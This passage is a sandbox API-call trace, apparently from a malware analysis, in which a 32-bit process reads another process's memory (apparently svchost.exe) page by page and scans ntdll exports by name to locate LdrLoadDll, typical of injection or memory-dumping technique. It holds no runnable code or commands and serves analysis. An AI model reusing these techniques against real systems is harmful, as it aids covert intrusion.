NumberOfBytesRead=0x1000) returned 0x0 [0077.624] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee456000, Buffer=0x7ff8, BufferSize=0x2796000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.625] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee457000, Buffer=0x7ff8, BufferSize=0x2797000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.625] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee458000, Buffer=0x7ff8, BufferSize=0x2798000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.625] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee459000, Buffer=0x7ff8, BufferSize=0x2799000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.625] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee45a000, Buffer=0x7ff8, BufferSize=0x279a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.625] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee45b000, Buffer=0x7ff8, BufferSize=0x279b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.625] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee45c000, Buffer=0x7ff8, BufferSize=0x279c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.626] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee45d000, Buffer=0x7ff8, BufferSize=0x279d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.626] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee45e000, Buffer=0x7ff8, BufferSize=0x279e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.626] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee45f000, Buffer=0x7ff8, BufferSize=0x279f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.626] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee460000, Buffer=0x7ff8, BufferSize=0x27a0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.626] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee461000, Buffer=0x7ff8, BufferSize=0x27a1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.626] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee462000, Buffer=0x7ff8, BufferSize=0x27a2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.660] lstrcmpA (lpString1="A_SHAFinal", lpString2="LdrLoadDll") returned -1 [0077.660] lstrcmpA (lpString1="A_SHAInit", lpString2="LdrLoadDll") returned -1 [0077.660] lstrcmpA (lpString1="A_SHAUpdate", lpString2="LdrLoadDll") returned -1 [0077.660] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="LdrLoadDll") returned -1 [0077.660] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="LdrLoadDll") returned -1 [0077.660] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="LdrLoadDll") returned -1 [0077.660] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="LdrLoadDll") returned -1 [0077.660] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="LdrLoadDll") returned -1 [0077.660] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="LdrLoadDll") returned -1 [0077.660] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="LdrLoadDll") returned -1 [0077.660] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="LdrLoadDll") returned -1 [0077.660] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="LdrLoadDll") returned -1 [0077.660] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="LdrLoadDll") returned -1 [0077.660] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="LdrLoadDll") returned -1 [0077.660] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="CsrClientCallServer", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="CsrGetProcessId", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="DbgBreakPoint", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="DbgPrint", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="DbgPrintEx", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="DbgPrompt", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="DbgUiContinue", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="LdrLoadDll") returned -1 [0077.661] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwEventEnabled", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwEventRegister", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwEventUnregister", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwEventWrite", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwEventWriteString", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwReplyNotification", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwSendNotification", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwSetMark", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwTraceMessage", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="LdrLoadDll") returned -1 [0077.662] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="KiUserInvertedFunctionTable", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrAccessResource", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrAddRefDll", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrEnumResources", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrFindResource_U", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrGetDllPath", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrGetFailureData", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrGetKnownDllSectionHandle", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrGetProcedureAddressForCaller", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="LdrLoadDll") returned -1 [0077.663] lstrcmpA (lpString1="LdrLoadDll", lpString2="LdrLoadDll") returned 0 [0077.663] VirtualFree (lpAddress=0x26c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.675] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x77ca0000 [0077.675] GetProcAddress (hModule=0x77ca0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77d0a840 [0077.675] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1dc, ProcessInformationClass=0x0, ProcessInformation64=0x5df4f4, ProcessInformationLength=0x30, ReturnLength=0x5df548 | out: ProcessInformation64=0x5df4f4, ReturnLength=0x5df548) returned 0x0 [0077.675] VirtualAlloc (lpAddress=0x0, dwSize=0x6c4, flAllocationType=0x3000, flProtect=0x4) returned 0x160000 [0077.675] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x77ca0000 [0077.676] GetProcAddress (hModule=0x77ca0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77d0a840 [0077.676] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1dc, ProcessInformationClass=0x0, ProcessInformation64=0x5df4f4, ProcessInformationLength=0x30, ReturnLength=0x5df548 | out: ProcessInformation64=0x5df4f4, ReturnLength=0x5df548) returned 0x0 [0077.676] StrRChrA (lpStart="C:\\Windows\\system32\\svchost.exe", lpEnd=0x0, wMatch=0x5c) returned="\\svchost.exe" [0077.676] StrRChrA (lpStart="C:\\Windows\\SYSTEM32\\ntdll.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ntdll.dll" [0077.676] StrRChrA (lpStart="C:\\Windows\\system32\\KERNEL32.DLL", lpEnd=0x0, wMatch=0x5c) returned="\\KERNEL32.DLL" [0077.676] StrRChrA (lpStart="C:\\Windows\\system32\\KERNELBASE.dll", lpEnd=0x0, wMatch=0x5c) returned="\\KERNELBASE.dll" [0077.676] StrRChrA (lpStart="C:\\Windows\\system32\\sechost.dll", lpEnd=0x0, wMatch=0x5c) returned="\\sechost.dll" [0077.676] StrRChrA (lpStart="C:\\Windows\\system32\\RPCRT4.dll", lpEnd=0x0, wMatch=0x5c) returned="\\RPCRT4.dll" [0077.676] lstrcmpiA (lpString1="svchost.exe", lpString2="NTDLL.DLL") returned 1 [0077.676] StrChrA (lpStart="svchost.exe", wMatch=0x2e) returned=".exe" [0077.676] lstrcmpiA (lpString1="svchost", lpString2="NTDLL.DLL") returned 1 [0077.676] lstrcmpiA (lpString1="ntdll.dll", lpString2="NTDLL.DLL") returned 0 [0077.676] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.677] VirtualAlloc (lpAddress=0x0, dwSize=0x1c2000, flAllocationType=0x3000, flProtect=0x4) returned 0x26c0000 [0077.677] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee380000, Buffer=0x7ff8, BufferSize=0x26c0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.677] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee381000, Buffer=0x7ff8, BufferSize=0x26c1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.677] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee382000, Buffer=0x7ff8, BufferSize=0x26c2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.677] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee383000, Buffer=0x7ff8, BufferSize=0x26c3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.677] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee384000, Buffer=0x7ff8, BufferSize=0x26c4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.678] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee385000, Buffer=0x7ff8, BufferSize=0x26c5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.678] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee386000, Buffer=0x7ff8, BufferSize=0x26c6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.678] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee387000, Buffer=0x7ff8, BufferSize=0x26c7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.678] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee388000, Buffer=0x7ff8, BufferSize=0x26c8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.678] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee389000, Buffer=0x7ff8, BufferSize=0x26c9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.678] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee38a000, Buffer=0x7ff8, BufferSize=0x26ca000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.678] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee38b000, Buffer=0x7ff8, BufferSize=0x26cb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.678] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee38c000, Buffer=0x7ff8, BufferSize=0x26cc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.679] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee38d000, Buffer=0x7ff8, BufferSize=0x26cd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.679] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee38e000, Buffer=0x7ff8, BufferSize=0x26ce000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.679] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee38f000, Buffer=0x7ff8, BufferSize=0x26cf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.679] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee390000, Buffer=0x7ff8, BufferSize=0x26d0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.679] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee391000, Buffer=0x7ff8, BufferSize=0x26d1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.679] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee392000, Buffer=0x7ff8, BufferSize=0x26d2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.679] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee393000, Buffer=0x7ff8, BufferSize=0x26d3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.680] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee394000, Buffer=0x7ff8, BufferSize=0x26d4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.680] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee395000, Buffer=0x7ff8, BufferSize=0x26d5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.680] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee396000, Buffer=0x7ff8, BufferSize=0x26d6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.680] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee397000, Buffer=0x7ff8, BufferSize=0x26d7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.680] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee398000, Buffer=0x7ff8, BufferSize=0x26d8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.680] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee399000, Buffer=0x7ff8, BufferSize=0x26d9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.680] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee39a000, Buffer=0x7ff8, BufferSize=0x26da000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.681] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee39b000, Buffer=0x7ff8, BufferSize=0x26db000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.681] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee39c000, Buffer=0x7ff8, BufferSize=0x26dc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.681] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee39d000, Buffer=0x7ff8, BufferSize=0x26dd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.681] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee39e000, Buffer=0x7ff8, BufferSize=0x26de000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.681] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee39f000, Buffer=0x7ff8, BufferSize=0x26df000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.681] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a0000, Buffer=0x7ff8, BufferSize=0x26e0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.681] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a1000, Buffer=0x7ff8, BufferSize=0x26e1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.682] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a2000, Buffer=0x7ff8, BufferSize=0x26e2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.682] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a3000, Buffer=0x7ff8, BufferSize=0x26e3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.682] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a4000, Buffer=0x7ff8, BufferSize=0x26e4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.682] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a5000, Buffer=0x7ff8, BufferSize=0x26e5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.682] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a6000, Buffer=0x7ff8, BufferSize=0x26e6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 